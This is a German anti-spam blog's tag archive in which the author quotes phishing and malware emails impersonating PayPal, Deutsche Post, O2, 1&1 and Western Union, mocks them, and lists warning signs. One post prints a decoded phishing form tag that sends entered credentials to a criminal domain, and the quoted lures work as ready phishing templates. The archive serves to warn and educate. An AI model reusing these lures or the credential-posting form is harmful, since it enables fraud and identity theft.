Unser täglich Spam

Aus dem Internet frisch auf den Tisch. Köstlich und aromatisch.


Schlagwortarchiv „Lieber Kunde“

Konto-Status

Donnerstag, 2. April 2015

Oh, wie schön: Etwas Phishing inmitten der ganzen Vorschussbetrüger. Bei welcher Bank bin ich denn heute mal wieder so sehr „Kunde“, dass sie nicht einmal meinen Namen kennt?

Lieber PayPal Kunde,

Ah ja, bei PayPal.

Aufgrund der jüngsten betrügerischen Aktivitäten haben wir ein neues Online-Sicherheitssystem für den maximalen Schutz der persönliche Daten [sic!] unserer Kunden gestartet.
Nach dieser Tatsache, [sic! Komischer Begriff und falsches Komma.] wird Ihnen angeboten, ihr PayPal-Konto zu aktualisieren.

Wie üblich, wenn PayPal mir schreibt, sind Grammatik, Wortwahl und Zeichensetzung ein bisschen komisch. Und wenn PayPal etwas an seiner Programmierung ändert, dann muss ich deshalb tätig werden. Ein großes Problem der Phisher ist und bleibt es, dass ihnen kaum gute Gründe einfallen, warum man jetzt seine Anmeldedaten auf einer anderen Seite als auf der Anmeldeseite eingeben sollte.

Um Ihr PayPal-Konto zu aktualisieren, liegt Ihnen in Ihrer E-Mail Adresse [sic! Deppen Leer Zeichen] ein Formular zur Verfügung [sic! Ausdruck].

Da dieser Phisher nicht so wirklich gut deutsch kann, weiß er auch nicht, wie er es ausdrücken soll, dass es einen Mailanhang gibt…

Bitte laden Sie das Formular aus [sic!], rufen Sie über Ihren Internet-Browser [sic!] und folgen Sie den Anweisungen auf dem Bildschirm.

…den man öffnen, ausfüllen und beklicken soll. Es handelt sich dabei um ein HTML-Dokument mit der stolzen Größe von 177,9 KiB, das einem die Möglichkeit einräumt, die gegenüber PayPal benutzte Kombination von Mailadresse und Passwort direkt an die organisierte Internet-Kriminalität zu senden. Dem Idioten, der diesen ziemlich aufgeblähten HTML-Code mutmaßlich aus der echten PayPal-Seite schnell zusammenkopiert hat, ohne ihn auch nur halbwegs zu verstehen…

Screenshot der Darstellung der angehängten HTML-Datei im Browser

…ist leider während der Arbeit sein Wörterbuch verloren gegangen, so dass er nicht mehr nachschlagen konnte, was „new“ denn jetzt auf deutsch heißt. :mrgreen:

Hinweis: Das Formular muss in einem modernen Browser geöffnet werden, dass JavaScript aktiviert hat [sic!]. (z.B. Internet Explorer, Mozilla Firefox)

Von nichts könnte ich weniger abraten als davon, einem Spammer das Privileg einzuräumen, Programmcode auszuführen. In diesem Fall wäre es relativ harmlos gewesen, denn hier dient ein verhältnismäßig komplexes Skript nur dazu, zu verbergen, dass die Daten nicht etwa an die Domain von PayPal gesendet werden, sondern an die ungleich weniger Vertrauen erweckende Domain s (punkt) psereu (punkt) us, die erst frisch vor einer Woche unter Angabe mutmaßlich irgendwo abgegriffener Daten registriert wurde. (Der vermutlich völlig unbeteiligte Einwohner der USA, dessen Identität hier von Verbrechern missbraucht wird, darf sich vermutlich in Kürze wegen des gewerbsmäßigen Computerbetrugs anderer Leute mit dem FBI herumschlagen. Das ist einer der Gründe, weshalb man sehr zurückhaltend mit seinen Daten umgehen sollte – egal, wie viel „Datenschutz“ auch versprochen wird.)

In einem zweiten Schritt „darf“ man übrigens einen umfassenden Datenstriptease hinlegen und jede Menge Daten gegenüber „PayPal“ angeben, die das echte PayPal schon lange kennt. Was machen die Verbrecher mit solchen Daten? Na ja, das übliche: Kreditkartenbetrug und hin und wieder mal unter einer fremden Identität auftreten, damit andere Leute ins Visier der Ermittler geraten.

Nach Abschluss dieser Phase [sic! Meinen die eine Mondphase?!] wird die Aktualisierung Ihres PayPal-Kontos normal funktionieren.

Genau wie vorher.

Wir entschuldigen uns für die Unannehmlichkeiten und danken Ihnen für Ihre Zeit.

Ja ja, ich verachte euch auch!

Für weitere Informationen kontaktieren Sie bitte den Kundenservice.

Es war offenbar kein Platz mehr auf dem Mailpapier, so dass nichts von Substanz gesagt werden konnte.

Mit freundlichen Grüßen,

PayPal-Team.

Ihr mich auch!

Eingangsbestätigung zu ihrer Bestellung 9234500900001 Deutsche Post vom Freitag, 24.10.2014

Mittwoch, 29. Oktober 2014

Vom Freitag? Schnell ist sie nicht, diese „Deutsche Post“.

Die folgende Mail ist eine gefährliche Spam. Sie kommt nicht von der „Deutschen Post“, die sich für ihren Mailverkehr wohl auch kaum einen Server in Frankreich mieten würde.

Liebe Kundin, lieber Kunde,

Mit dieser Nachricht bestätigen wir, dass Ihre Bestellung bei uns eingegangen ist. (siehe anhängende Datei)

Mit freundlichen Grüßen,
Ihr Deutsche Post eFiliale Online-Team [sic!]

Wie immer, wenn die Ansprache unpersönlich ist und ein angeblicher Geschäftsvorfall behauptet wird, über den nichts weiter als eine Nummer mitgeteilt wird, ist der Anhang, der angeblich über alles aufklären soll, das reinste Gift. In dem angehängten ZIP-Archiv liegt eine Datei mit dem Dateinamen Rechnung zu Ihrer Bestellung.exe, die das Piktogramm eines PDF-Dokumentes trägt. Das ist eine ausführbare Datei für Microsoft Windows, unter Vorwand zugestellt von anonymen Spammern, und wer diese verbrecherische Software gestartet hat, hat jetzt einen Computer anderer Leute auf dem Schreibtisch stehen.

Die Schadsoftware wird nur von rd. 40% der gängigen Antivirus-Schlangenöle als Schadsoftware erkannt und aussortiert, bevor sie größeren Schaden anrichten kann. Aber zum Glück sollte inzwischen fast jeder Mensch wissen, dass…

  1. …die anonyme Anrede der Marke „lieber Kunde“ ein Alarmzeichen ist;
  2. …eine gemailte Bestellbestätigung, die im Text nichts als eine dumme Nummer über die Bestellung mitteilt, ein Alarmzeichen ist;
  3. …eine angebliche E-Mail von einem Unternehmen zu einem angeblichen Geschäftsvorfall, in der keine Telefonnummer für schnelle Rückfragen angegeben ist, ein Alarmzeichen ist; und dass
  4. …ein E-Mail-Anhang mit einem angeblichen PDF-Dokument in einem ZIP-Archiv ein Alarmzeichen ist…

…und einfach unbeschwerten Herzens und unerschrocken die Spam löschen. (Das gleiche gilt natürlich auch, wenn das ZIP nicht angehängt wurde, sondern ein Link auf die angeblichen Dokumente gesetzt wurde. Und eine Bullshit-Unterschrift wie „Ihr Deutsche Post eFiliale Online-Team“ sollte natürlich auch skeptisch machen, so sehr die Werber nach mehreren gepuderten Nasen auch immer darum bemüht sind, die sprachlichen Auftritte von Unternehmungen zu realdadaistischen Akten zu machen.)

Und genau damit ist das einzige große Einfallstor für Schadsoftware über E-Mail geschlossen. Kurze Merkregel: Hängt ein ZIP an einer Mail, lösch den Müll! Es ist weder sachlich noch technisch erforderlich, PDF-Dokumente zusätzlich durch Verpacken in ein ZIP-Archiv zu komprimieren; diese sind sowohl digital signierbar wie auch komprimierbar.

Konto-Status

Freitag, 6. Juni 2014

Nein, diese Mail kommt nicht von PayPal! Und sie ist ein weiteres Beispiel für die vielen schlechten Phishing-Mail, die man jeden verdammten Tag in seinem Posteingang (oder seinem Spamfilter) finden kann.

Lieber PayPal Kunde,

„Lieber Kunde“ ist genau der Name, den ich bei jedem Vertrag angebe. :mrgreen:

Aufgrund der jüngsten betrgerischen [sic!] Aktivitäten haben wir ein neues Online-Sicherheitssystem für den maximalen Schutz der persönliche Daten unserer Kunden gestartet.

Wie man in einer HTML-formatierten E-Mail ein „ü“ codiert, wisst ihr nicht, aber vom tollen Online-Sicherheitssystem für den maximalen Schutz blahfaseln! Ihr seid mir schon ein paar Experten!

Nach dieser Tatsache, wird Ihnen angeboten, ihr PayPal-Konto zu aktualisieren.

Oh, was für ein tolles Angebot! 😀

Um Ihr PayPal-Konto zu aktualisieren, liegt Ihnen in Ihrer E-Mail Adresse ein Formular zur Verfügung [sic!].

Dieses „liegt zur Verfügung“ heißt, wenn man Deutsch spricht, übrigens „ist angehängt“. Aber woher soll ein armes Übersetzungsprogramm das wissen, wenn es mit dem alphabetisch sortierten Sprachgefühl eines Wörterbuches aus dem Russischen ins Deutsche übelsetzt.

Bitte laden Sie das Formular aus [sic!], rufen Sie ber [sic!] Ihren Internet-Browser und folgen Sie den Anweisungen auf dem Bildschirm.

Jemand, der Deutsch gekonnt hätte, hätte hier geschrieben: „Bitte speichern sie den Anhang und öffnen sie ihn anschließend in ihrem Browser“. Aber lassen wir das! Der Spammer mit der miesen Sprache und der noch mieseren Masche hängt also etwas an seine Spam und verlangt von den Empfängern allen Ernstes, dass sie diesen Anhang auch öffnen. Wer auch nur für zehn Cent Verstand hat, würde nicht auf Traum auf diese Idee kommen, zumal der Spammer auch noch…

Hinweis: Das Formular muss in einem modernen Browser geöffnet werden, dass [sic!] JavaScript aktiviert hat. (z.B. Internet Explorer, Mozilla Firefox)

…zwingend das Privileg haben will, Code im Browser auszuführen.

Der für den Spammer wichtige Code ist übrigens relativ harmlos, aber das werden die meisten Empfänger nicht nachvollziehen können, weil ihnen dafür das technische Verständnis fehlt. Er besteht aus folgender Zeile JavaScript, die ich hier als Screenshot meines Editors wiedergebe:

Screenshot eines Ausschnitts des betrügerischen HTML-Anhangs der Spam in meinem Editor

Aha, sagt sich der Spamgenießer, neuerdings schreibt man seinen HTML-Code nicht mehr direkt, sondern lässt ihn vom Browser mit einer Zeile JavaScript generieren, damit der kriminelle Müll wenigstens manchmal noch durch die Spamfilter geht. Was nach dem Aufruf von unescape() aus dem langen Text wird, sieht so aus:

<form method="post" onsubmit="return validateFormOnSubmit(this)" action="http://q.dnssv.tk/de/cgi-bin/webscr.php?cmd=_logout">

Was man in dieses Formular einträgt, geht also nicht in die PayPal-Domain, sondern in die deutlich weniger Vertrauen erweckende Domain t (punkt) dnssv (punkt) tk, die offensichtlich von Kriminellen kontrolliert wird. Das ist aber auch nicht weiter überraschend, denn das richtige PayPal versendet solche Mails nicht. Was hätte PayPal auch davon, wenn die Kunden…

Screenshot der Darstellung des betrügerischen Anhangs der Phishing-Spam im Webbrowser

…noch einmal jede Menge Daten mitteilen würden, die PayPal schon längst kennt? :mrgreen:

Einmal ganz davon abgesehen, dass jemand bei PayPal wissen würde, dass einer dieser zwölf Abschnitte des Jahres auf Deutsch nicht als „Monath“ geschrieben wird und dass die „Postzahl“ hier eine „Postleitzahl“ genannt wird. Ein krimineller Spammer macht sich aber nicht die Mühe, sein Gestrokel auf Fehler abzusuchen, weil… tja… wenn er sich Mühe gäbe, er doch auch gleich arbeiten könnte.

Nach Abschluss dieser Phase [sic!] wird die Aktualisierung Ihres PayPal-Kontos normal funktionieren.

Und vorher auch. 😀

Wir entschuldigen uns für die Unannehmlichkeiten und danken Ihnen für Ihre Zeit. Für weitere Informationen kontaktieren Sie bitte den Kundenservice.

Oh, wie höflich! Ich könnte spucken vor Respekt!

Mit freundlichen Grüßen,
PayPal-Team.

Mit unfreundlichem Blick zurück
Spamessergemeinschaft.

Copyright ᄅ 1999-2014 PayPal. Alle Rechte vorbehalten.

Copyright für eine Spammail! Komm, Spammer, fordere doch mal eine Vergütung für mein Vollzitat ein!

(Und nein: Richtige Unternehmen, die so ein proklamiertes „geistiges Eigentum“ unter ihre E-Mails „rotzen“, sind in dieser intelligenzverachtenden Geste keinen Deut seriöser als dieser kriminelle Idiot von Phisher.)

PayPal (Europe) S.¢ r.l.et Cie, S.C.A.
Société en Commandite par Actions
Registered office: 22-24 Boulevard Royal, L-2449 Luxemburg
RCS Luxemburg B 118 349
PayPal Email ID PP58

Nun, von PayPal kommt diese Mail nicht. Zum Thema Phishing hat PayPal – lobenswerterweise! – selbst einen langen und guten Text auf seiner Website veröffentlicht, der das für jeden Nutzer völlig klar machen sollte – wenn er den Text denn auch liest.

Payment slip

Freitag, 14. März 2014

Dear Customer,

Klar, „Lieber Kunde“ ist eine voll persönliche und echt überzeugende Ansprache.

Good morning, attached here is the payment slip of USD 176,000.00 of our balance payment, please confirm and get back to us.

Thanks and best regards,
Martins.

Contact Us.
Susan
American Changer Corporation
1400 N. W. 65th Place
Fort Lauderdale, FL 33309

Phone: 954-917-30xxx
Fax: 954-917-30xxx

Toll Free: 800-741-9840

Oh, wie schön! Aber ich kenne diese Klitsche doch gar nicht. Und nicht nur das, der Mailanhang ist nicht etwa der versprochene Beleg, sondern eine fiese Kollektion von Schadsoftware, die zum Glück von den meisten Virenscannern sicher erkannt wird. So viel Glück hat man allerdings nicht immer.

Ach ja, die Absenderangaben und Telefonnummern sind natürlich Mumpitz. Dort anzurufen macht nur ein paar Leuten noch mehr Stress, die erstens mit dieser Spam nichts zu tun haben und die zweitens eh schon einen unerfreulichen Tag voller erboster Anrufe durchstehen müssen. Ich bin übrigens der kommissarische Kaiser des Deutschen Reiches. Das habe ich jetzt irgendwo ins Internet geschrieben, also muss es wohl stimmen. 😉

1und1 Sicherheit – Fehlgeschlagende Zugriffe

Sonntag, 1. Dezember 2013

Das Wichtigste vorab: Diese Mail stammt NICHT von 1&1. Es handelt sich um einen Phishing-Versuch.

Und ja, dieser Versuch kommt gleich mit einem auffälligen Verschreiber im Betreff, damit ein aufmerksamer Leser schon vor dem Lesen weiß, dass es sich nicht um eine Standard-Mail von 1&1 handelt, sondern um den Versuch eines Kriminellen, sich als 1&1 auszugeben.

Lieber Kunde,

Und weil die Mail nicht von 1&1 kommt, ist dem Absender auch keine bessere Ansprache als „Lieber Kunde“ möglich. Dabei hätte er in diesem Fall durchaus den Namen aus der Mailadresse erraten können:

Dies ist eine automatisch generierte E-Mail bezüglich der versuchten Änderung(en), die kürzlich an Ihrem 1und1.de-Konto vorname (punkt) nachname (at) online (punkt) de vorgenommen werden sollten.

[Natürlich ist der Name im Zitat geändert – aber im Original stand eine Mailadresse, die einen Vor- und einen Nachnamen enthielt.]

Aber ein dummes Spamskript ist nun einmal nicht sehr intelligent. Und ein Spammer übrigens auch nicht, wie man an der papierhaft-barocken Formulierung „bezüglich blah blah“ mit Verbhaufen „vorgenommen werden sollten“ am Ende des Satzes erkennen kann, die auch so richtig „fehlgeschlagend“ ist. Jeder richtige Dienstleister, der möchte, dass seine automatisch generierten E-Mails unmissverständlich und modern klingen, schriebe so etwas wie „Sie erhalten diese E-Mail, weil versucht wurde, eine Änderung an ihrem Konto vorzunehmen“. Klare, unverbogene und unmissverständliche Formulierungen sparen nämlich Geld im Support.

Es wurde versucht Ihr Passwort über die Passwort Vergessen Funktion [sic! Mit Deppen Leer Zeichen] zurückzusetzen. Sollten Sie versucht haben die Änderung vorzunehmen, betrachten Sie diese E-Mail bitte als gegenstandslos.

Apropos Dummheit und Formulierungen: Was sagt dieser Absatz? Es wurde versucht, ein Passwort zurückzusetzen. Aha. Und war dieser Versuch erfolgreich? Unwichtig. Muss diese Änderung eines Passwortes irgendwie bestätigt werden? Unwichtig. Gerade, wenn jemand selbst versucht hat, sein Passwort zu ändern, ist eine solche Mail in aller Regel nicht „gegenstandslos“, weil sie typischerweise einen Link (oder in eingen Fällen auch¹: einen Code für die Eingabe in einem zweiten Schritt) enthält, mit dem man diese Änderung bestätigen muss. Dieser Vorgang wird aus naheliegenden Gründen im Text der Mail so erklärt, dass beim Lesen klar wird, was ein Klick bewirkt.

Ein dummer Spammer, der sich keine großen Gedanken macht – sonst könnte er ja gleich arbeiten gehen – formuliert allerdings nicht ganz so klar:

Klicken Sie hier, um loszulegen

Immerhin schreibt er für seinen dummen, nichtssagenden „Click-here“-Linktext nicht „Bezüglich ihrer Loslegung tätigen sie ihren Klick auf diesem unterstrichenen Text“. :mrgreen:

Der Link geht nicht zur Website von 1&1, sondern zu einer Site unter deutlich weniger Vertrauen einflößenden Domain 34 (punkt) 04 (punkt) webmailer1und1 (punkt) org. Die Domain mit dem vorsätzlich irreführenden Namen webmailer1und1 (punkt) org wurde am 15. November dieses Jahres eingerichtet, und natürlich sind die Registrierungsdaten über einen Whois-Anonymisierer verschleiert. (Keine Unternehmung würde die Kommunikation mit solchen Maßnahmen erschweren.)

Jeder kann sich eine Domain registrieren, die als Namensbestandteil eine Firmierung enthält. Das ist an sich nicht illegal. Allerdings wird man es sehr schnell mit der Rechtsabteilung des Unternehmens zu tun bekommen (wenn man nicht gerade eine geduldete Fan-Site betreibt) und hat, wenn man diesen Missbrauch der Firmierung nicht einstellt, eine Markenrechts-Sache am Hals, die einen sehr hohen Streitwert hat und dementsprechend teuer wird. Verbrechern, die von vornherein mit gephishten Daten anderer Menschen und von Computern anderer Menschen aus agieren, sind solche Gefahren allerdings gleichgültig, die bösen, teuren Briefe gehen ja zu jemanden anders. Zum Beispiel zu jemanden, dessen Daten sie durch Phishing gewonnen haben.

Wir bedanken uns für die Nutzung unserer Serviceleistungen und freuen uns auf die weitere Zusammenarbeit.

Das Schlimme an diesem Absatz ist: Ich muss befürchten, dass 1&1 in echten Mails ähnliche Textbausteine an dermaßen unpassenden Stellen benutzt. 🙁

Mit freundlichen Grüßen

Ihre 1&1 Internet AG

1&1 Internet AG, Elgendorfer Str. 57, 56410 Montabaur
Amtsgericht Montabaur HRB 6484
Vorstände: Henning Ahlert, Ralph Dommermuth, Matthias Ehrlich, Thomas Gottschlich, Robert Hoffmann, Markus Huhn, Hans-Henning Kettler, Dr. Oliver Mauss, Jan Oetjen
Aufsichtsratsvorsitzender: Michael Scheeren

Wie schon gesagt, diese Mail stammt nicht von 1&1, dieser Text ist – genau wie der folgende Absatz mit einer in diesem Kontext völlig unpassenden Reklame – vermutlich aus einer echten Mail von 1&1 entnommen.

Schon gewusst?
Mit den 1&1 Produkten können Sie richtig Geld verdienen!

Registrieren Sie sich einfach KOSTENLOS (!) als 1&1 ProfiSeller und empfehlen Sie unsere Produkte Ihren Freunden und Bekannten. Für jeden vermittelten Auftrag erhalten Sie attraktive Provisionen! GARANTIE: Es gibt keine Abnahmeverpflichtung, keinen Mindestumsatz, keinen Mitgliedsbeitrag oder ähnliches. Über 300.000 1&1 Kunden haben sich bereits registriert! Machen Sie jetzt auch mit unter: http://www.profiseller.de/ps-neu

[Dies ist eine automatisch generierte Nachricht, bitte antworten Sie nicht an diesen Absender.]

Abschließende Anmerkung
Mit einer kurzen Meinungsäußerung über 1&1

Diese Phishing-Spam wurde mir von meinem Leser G. K. zugesandt.

Er hat diese Mail am 16. November erhalten, also vor gut zwei Wochen. Damals war dieser Betrug – wie man am Registrierungsdatum der Domain sieht – noch ganz frisch und – trotz gewisser Schwächen in der Formulierung der Phishing-Mail – durchaus gefährlich. Es handelt sich um einen Phishingversuch, der sich speziell auf Kundendaten bei 1&1 richtet. Vermutlich wurden die E-Mails nicht als „Streumunition“ versendet – ich habe nämlich keine erhalten – sondern gezielt an E-Mail-Adressen, die von 1&1 betrieben werden. Die Quelle dieser Adressen ist unklar, aber es gab ja einige große Datenlecks in den letzten Monaten.

G. K. hat diese E-Mail auch an den Kundendienst von 1&1 gesendet. Daraufhin gab es eine Eingangsbestätigung (die vermutlich automatisch versendet wird), und es geschah in den folgenden zwei Wochen nichts.

Oder anders gesagt: Die Unternehmung, die als 1&1 firmiert, wurde von einem ihrer Kunden auf eine laufende Betrugsnummer der organisierten Internet-Kriminalität gegen 1&1-Kunden hingewiesen, und 1&1 hielt es nicht für nötig, mit diesem Hinweis irgendetwas anzufangen. Es gab nicht einmal ein Danke für den Hinweis. Es gab scheinbar auch keinen Versuch, die eigenen Kunden deutlich auf diesen laufenden Betrug hinzuweisen, um sie davor zu schützen. Wenn überhaupt jemand bei 1&1 auf diese Mail reagiert hat – die in der Spam verlinkte Phishingseite ist inzwischen vom Server entfernt worden – dann hat dieser Jemand es nicht für nötig befunden, eine kurze Mitteilung in Form einer Antwort zu schreiben, so etwas wie: „Vielen Dank für ihren Hinweis, unsere Rechtsabteilung lässt zurzeit die Phishingsite mit dem Missbrauch unserer Firmierung entfernen“.

Man scheint es bei 1&1 für wichtiger zu halten, unter hohem finanziellen Aufwand eine glatte Präsentation der angebotenen Dienstleistung in der Fernsehreklame sicherzustellen, als sich um die Sicherheit der Kunden zu kümmern und auf die E-Mail von Kunden zu einem aktuellen und durchaus gefährlichen Betrug zu reagieren.

Meiner Meinung nach sind das falsche Prioritäten. Und meiner Meinung nach sind diese falschen Prioritäten schlecht und dringend änderungsbedürftig. Die Internet-Kriminalität ist gefährlich, und sie erfordert als Reaktion etwas mehr als einen Akt der Verdrängung. Sie verschwindet nämlich nicht, wenn man nicht hinschaut. Sie wird größer, gefährlicher und schlimmer.

Angesichts dieser falschen Prioritäten würde ich zurzeit davon abraten, Kunde bei 1&1 zu werden.

¹Dieses zunächst umständlich wirkende Verfahren mit einem Code für die Eingabe in einem zweiten Schritt ist aus meiner Sicht wesentlich besser. Wenn man Kunden daran gewöhnt, nicht in einer Mail herumzuklicken, ist das eine kleine psychologische Maßnahme gegen Phishing. Ein Phishing wie in dieser Mail funktioniert ja nur, weil viele Menschen es aus ihrer Alltagserfahrung heraus für völlig normal halten, in eine Mail zu klicken. Wird das zu einem ungewöhnlichen Vorgang, weckt due Aufforderung eines Phishers, man solle klicken, einen Verdacht, der zur Aufmerksamkeit führt.

We inform you that you have won € 1000 Summer Promo at Western Union

Mittwoch, 31. Juli 2013

Heute sind aber viele im Honigtopf. 😯

Natürlich hat Western Union mit dieser Mail nichts zu tun.

Das ist endlich mal ein „guter“ Absender, da wundert sich das leichtgläubige Opfer auch nicht mehr darüber, das es eventuelle Vorleistungen für seinen „Gewinn“ schön anonym über Western Union ablegen soll. Und noch etwas ist neu. Es ist nicht von Millionenbeträgen die Rede, weil wohl inzwischen jeder Spamfilter dieser Welt einen sechstelligen Betrag mit einem Währungszeichen davor als deutliches Indiz für einen Vorschussbetrug wertet…

Der gefälschte Absender dieser angeblich von Western Union stammenden Gewinnbenachrichtigung ist übrigens test (at) dsa (strich) inc (punkt) com. Das ist – wenn man schon Absender fälscht – eine ziemlich blöde Wahl. Die Empfängeradresse liegt in der Domain westernunion (punkt) im, die laut whois-Abfrage nicht etwa Western Union, sondern einem angeblichen „Alexe Dadell“ aus dem sonnigen, brummenden Bukarest gehört, dessen angegebene Postanschrift Google Maps aber leider nicht bekannt ist.

Vermutlich geht es diesmal auch nicht den guten alten Vorschussbetrug, sondern „nur“ um das Abgreifen von Adressmaterial für kriminelle Geschäfte. Das wird in der Mail deutlicher. Wer da wirklich einen eingescannten Ausweis, eine eingescannte Kreditkarte und seine Anschrift hinsendet, darf sich über zwei Jahre nervlich aufwühlenden Schriftverkehr mit Firmen, Inkassoklitschen, Banken, Polizeien, Staatsanwälten und Ermittlungsrichtern „freuen“.

Dear customer,

Lieber Unbekannter,

We inform you that you have won € 1000 Summer Promo at Western Union Need to receive copy of identification to award and will release the MTCN code with victory

wir wollen dir nur kurz erzählen, dass du tausend Euro bei einer Reklamelotterie von Western Union gewonnen hast, von der du gar nichts in irgendeiner Reklame gelesen hast. Sei doch bitte mal so leichtgläubig, dass du uns wegen dieser Geschichte aus einer Spam erzählst, wer du überhaupt bist, damit wir dir den Code geben können, mit dem du dir die beiden lila Lappen abholen kannst. Das können wir nämlich nicht einfach so machen, obwohl wir das so machen könnten.

Please send a color copy of:

* Identity document

* Credit card front and back [sic!]

* Proof of address – utility bill (eg gas, electric, water or fixed line telephone but not a mobile phone bill). It must be no more than three months old and show your name and current address

Schmeiß mal deinen Farbscanner an und gib uns bitte möglichst vollständige Daten von dir. Wir brauchen deinen vollständigen Namen, deinen Ausweis (mit Nummer), dein Geburtsdatum (steht auf dem Ausweis), deine Kreditkartennummer, den Ablaufmonat deiner Kreditkarte und deine aktuelle Anschrift. Das ermöglicht uns schon einmal einen guten Identitätsmissbrauch für unsere kriminellen Geschäfte und ist für die Auszahlung objektiv unnötig. Du als „lieber Kunde“ hast sicher Verständnis dafür, dass die organisierte Kriminalität lieber in deinem Namen handelt als selbst Ärger mit diesen lästigen Ermittlern zu bekommen.

Vielleicht erzählen wir dir auch noch ein paar Märchen und nehmen dir fünfzig Euro Vorleistung dafür ab, dass du an den angeblichen Tausender kommst. Du weißt ja: Wer den Pfennig nicht ehrt…

Send documents at:
westernunion (at) westernunion (punkt) im

Bitte nicht daran stören, dass der Absender gefälscht wurde.

Amount to pick up: €1000,00
Sender: Western Union Inc

Und immer dran denken: Es geht um tausend Euro!!!1! Grund genug, den Verstand auszuschalten und jede Vorsicht beiseite zu legen.

© 2001-2013 Western Union Holdings, Inc., All Rights Reserved.

Keine Drecksmail ohne proklamiertes Urheberrecht.

Ihre O2 DSL Bestellung (Kundennummer DE17858936)

Dienstag, 25. Juni 2013

Vorab: Diese Mail ist nicht von O2!

Oh wie schön, ich habe eine Kundennummer. Die ist ja fast so interessant wie die Lottozahlen für jemanden, der nicht Lotto spielt.

Lieber O2 Kunde,

Wir wissen nicht, wie der Mensch mit der Kundennummer heißt, obwohl…

Informationen zu Ihrem Auftrag finden Sie im Anhang an diese E-Mail als pdf-Datei. Diese können Sie mit einem Doppelklick ganz einfach öffnen.

…er uns doch einen „Auftrag“ erteilt hat. Vermutlich kam der Auftrag von irgendeiner Nummer und nicht von einem Menschen mit Namen und Postanschrift.

„Ganz einfach öffnen“ heißt hier übrigens: Es handelt sich um ein ZIP-Archiv. In diesem ZIP-Archiv befindet sich eine Datei der Marke .pdf.exe, also eine direkt ausführbare Datei für Microsoft Windows, die von kriminellen Spammern zugestellt wurde. Damit nicht ganz so schnell auffällt, was es mit dieser Datei auf sich hat, wurden nach .pdf ein paar lustige Leerzeichen eingefügt.

Wer das ZIP-Archiv „ganz einfach“ mit einem Doppelklick öffnet und dann dieses angebliche PDF ebenso einfach mit einem Doppelklick lesen will, führt Software von Kriminellen auf seinem Rechner aus. Hinterher steht auf seinem Schreibtisch ein Computer anderer Leute, und seine Internetleitung wird ebenfalls von Kriminellen für Spam, üble „Geschäfte“, Manipulation des Online-Bankings, Abgreifen von Daten und alles mögliche missbraucht. 85 Prozent der so genannten Antivirusprogramme erkennen diese Schadsoftware zurzeit noch nicht, das wird also mal wieder zwei Tage dauern, bis man vor der Brut von heute halbwegs geschützt ist.

Da ist es doch gut, wenn man ein Gehirn hat, das diese Spam erkennen kann, so dass man auf die wieder einmal nutzlose Schutzsoftware gar nicht angewiesen ist. 😀

Hinweise zum pdf-Format: Zum Lesen, Drucken und/oder Speichern von PDF-Dateien benötigen Sie das Programm Acrobat Reader von Adobe. Haben Sie den Acrobat Reader noch nicht auf Ihrem Computer installiert, können Sie ihn hier kostenlos herunterladen: http://www.adobe.de/products/acrobat/readstep2.html

Toller Hinweis. In dieser Textmenge wäre auch Platz für einen Hinweis gewesen, was da überhaupt von wen bestellt wurde, was die angebliche Bestellung kostet und so weiter! Spams mit angeblichen PDFs, die in Wirklichkeit Schadsoftware sind, erkennt man regelmäßig daran, dass der Text der Mail alle wichtigen Informationen (außer vielleicht einen alarmierend hohen Preis) verschweigt und für solche wichtigen Einzelheiten auf ein angehängtes Dokument verweist, welches in der Regel in ein ZIP-Archiv gepackt ist, damit es die Antivirusprogramme etwas schwerer haben – und dass der Text mit eher sinnlosen „Informationen“ aufgebläht wird, damit die gnadenlose Dummheit dieser Masche nicht sofort auffällt. Es gibt keinerlei sachlichen Grund für ein Unternehmen, so vorzugehen. Es gibt überhaupt keinen Grund, ein PDF in ein ZIP-Archiv zu packen, denn PDF-Dokumente können bereits komprimiert werden. Es gibt noch weniger als überhaupt keinen Grund, im Text der E-Mail nichts zum Geschäftsvorfall zu sagen und damit Missverständnisse zu provozieren, die zu teuren Support-Angelegen werden können. Niemand würde das tun. Jedenfalls niemand, der noch bei Troste ist. Es ist ein sicheres Erkennungszeichen für Spam mit Schadsoftware.

Unser persönlicher Tip für Sie: Möchten Sie die Datei auf Ihrem Rechner abspeichern? Verwenden Sie einfach die rechte Maustaste und klicken Ziel speichern unter an. Anschließend wählen Sie das Verzeichnis auf Ihrem Rechner aus, in dem die Datei abgespeichert werden soll.

Oh, wie schön, jetzt tippt uns der Spammer noch „persönlich“ und erklärt dem Empfänger einer E-Mail, wie man einen Anhang speichert, als ob der Empfänger einer E-Mail das nicht wüsste. Das ist ja fast so „persönlich“ wie die Ansprache als „lieber Kunde“. :mrgreen:

Freundliche Grüße

Ihr O2 Team

Feindliche Grüße

Ihr krimineller Spammer

Kontoinformаtionen аktuаlisieren

Sonntag, 9. Juni 2013

Absender Paypal mietze911 (at) gmx (punkt) net

Das ist bestimmt wieder eine echte Qualitätsspam! 😀

Natürlich kommt diese Mail nicht von Paypal. Und natürlich ist dieser Absender gefälscht. Aber wenn man schon einen Absender fälscht, könnte man doch eigentlich auch eine halbwegs überzeugende Adresse nehmen, oder? Zu kleinen intellektuellen Leistung dieser Überlegung war der dumme Spammer entweder nicht willens oder nicht imstande.

Lieber Kunde,

Aber so ein lieber Kunde! :mrgreen:

Wir аrbeitet [sic!] fortlаufend аn der Gewährleistung der Sicherheit. Dаzu werden die Konten in unserem System regelmäßig überрrüft.

Vor meinem inneren Auge wuselt die „Abteilung für die Gewährleistung der Sicherheit“ ameisenhaft durch den Serverpark PayPals und prüft einfach anlasslos immer wieder zyklisch alle Konten durch. Mit einem Sicherheitsgewährleistungsprüfgerät.

Kürzlich hаben wir Ihr Konto geрrüft und benötigen weitere Informаtionen, dаmit wir Ihnen einen sicheren Service аnbieten können.

Leider sind die Prüfungen so gut, dass man als Kunde etwas davon mitbekommt. Man bekommt nämlich tolle Mails von GMX… sorry… „PayPal“, in denen man dazu aufgefordert wird, „PayPal“ noch einmal lauter Dinge zu sagen, die PayPal schon längst weiß. Vermutlich wird die Datenbank von PayPal zur „Gewährleistung der Sicherheit“ einmal ratzekahl durchgelöscht – nur die Kontostände bleiben erhalten. Und wenn man das nicht tut…

Solаnge uns diese Informаtionen nicht zur Verfügung stehen, ist Ihr Zugаng zu vertrаulichen Kontofunktionen eingeschränkt. [sic!]

…wird der Zugang zu vertraulichen Kontofunktionen eingeschränkt. Ob die wohl so vertraulich sind, dass noch niemand etwas davon mitbekommen hat?

Wir möchten Ihren Zugаng schnellstmöglich wiederherstellen und entschuldigen uns für diese Unаnnehmlichkeit.

Klicken Sie bitte hier um diese Beschränkung аufheben zu können

